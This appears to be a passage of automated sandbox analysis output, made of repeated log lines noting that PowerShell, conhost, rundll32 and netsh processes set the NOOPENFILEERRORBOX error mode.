    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
